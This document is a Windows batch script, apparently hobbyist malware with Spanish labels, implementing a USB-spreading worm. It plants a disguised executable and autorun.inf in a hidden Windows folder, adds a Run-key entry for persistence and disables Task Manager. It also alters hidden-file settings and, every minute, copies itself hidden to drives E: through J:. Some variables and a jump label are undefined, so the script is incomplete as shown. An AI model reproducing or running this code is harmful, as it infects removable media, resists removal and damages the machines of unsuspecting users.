@echo off
SET AUTORUNORIGINAL=%WINDIR%\14785\WINUPDATE.DLL
 
SET AUTORUN=autorun.inf

MD "%WINDIR%\14785"

ECHO [AUTORUN] >%AUTORUNORIGINAL%
ECHO open=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\1=abrir >>%AUTORUNORIGINAL%
ECHO shell\1\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shell\2\=explorar >>%AUTORUNORIGINAL%
ECHO shell\2\Command=%WORM% >>%AUTORUNORIGINAL%
ECHO shellexecute=%WORM% >>%AUTORUNORIGINAL%

COPY %WORMORIGINAL% "%WINDIR%\14785\SYSTEMSHELL.exe"

START %MYFILES%\server.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f

:CHEKARWORM
 
IF NOT EXIST "D:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "E:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "F:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "G:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "H:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "I:\%WORM%" GOTO COPIARWORM
IF NOT EXIST "J:\%WORM%" GOTO COPIARWORM
 
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%WORM%"
ATTRIB +S +H +R "E:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%WORM%"
ATTRIB +S +H +R "F:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%WORM%"
ATTRIB +S +H +R "G:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%WORM%"
ATTRIB +S +H +R "H:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%WORM%"
ATTRIB +S +H +R "I:\%WORM%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%WORM%"
ATTRIB +S +H +R "J:\%WORM%"
 
COPY "%AUTORUNORIGINAL%" "E:\%AUTORUN%"
ATTRIB +S +H +R "E:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "F:\%AUTORUN%"
ATTRIB +S +H +R "F:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "G:\%AUTORUN%"
ATTRIB +S +H +R "G:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "H:\%AUTORUN%"
ATTRIB +S +H +R "H:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "I:\%AUTORUN%"
ATTRIB +S +H +R "I:\%AUTORUN%"
COPY "%AUTORUNORIGINAL%" "J:\%AUTORUN%"
ATTRIB +S +H +R "J:\%AUTORUN%"

GOTO LOOP

:LOOP

ping 127.0.0.1 -n 60
GOTO CHEKARWORM